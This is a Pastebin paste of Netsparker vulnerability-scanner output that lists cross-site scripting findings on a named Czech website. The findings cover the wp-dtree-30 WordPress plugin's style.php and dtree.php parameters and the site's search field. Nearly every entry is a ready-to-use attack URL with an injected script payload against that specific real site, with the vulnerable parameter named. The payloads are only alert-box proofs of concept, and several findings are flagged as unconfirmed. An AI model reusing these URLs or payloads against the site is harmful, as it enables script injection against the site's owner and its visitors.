Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * [Possible] Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize='"--></style></script><script>alert(0x000154)</script>&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: fontsize
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000154)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf='"--></style></script><script>alert(0x000182)</script>&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: fontf
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000182)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor='"--></style></script><script>alert(0x0001B2)</script>&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: sfontdecor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0001B2)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor='"--></style></script><script>alert(0x000208)</script>&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: mfontcolor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000208)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor='"--></style></script><script>alert(0x000257)</script>&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: lfontcolor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000257)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor='"--></style></script><script>alert(0x000288)</script>&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: lfontdecor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000288)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor='"--></style></script><script>alert(0x0002B4)</script>&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: hfontcolor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0002B4)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor='"--></style></script><script>alert(0x0002D1)</script>&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: hfontdecor
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0002D1)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx='"--></style></script><script>alert(0x0002F7)</script>&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: rssgfx
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x0002F7)</script>
- ...
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh='"--></style></script><script>alert(0x000317)</script>
- Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
- Parameter Name: rssgfxh
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000317)</script>
- * Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree.php?witheff=1&eff=blind&effdur='"--></style></script><script>alert(0x0001AA)</script>
- Parameter Name: effdur
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0001AA)</script>
- ...
- http://www.bazen-trebova.cz/?s='"--></style></script><script>alert(0x000248)</script>
- Parameter Name: s
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000248)</script>
- ...
- http://www.bazen-trebova.cz/?"><script>alert(9)</script>
- Parameter Name: Query Based
- Parameter Type: FullQueryString
- Attack Pattern: "><script>alert(9)</script>
- ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement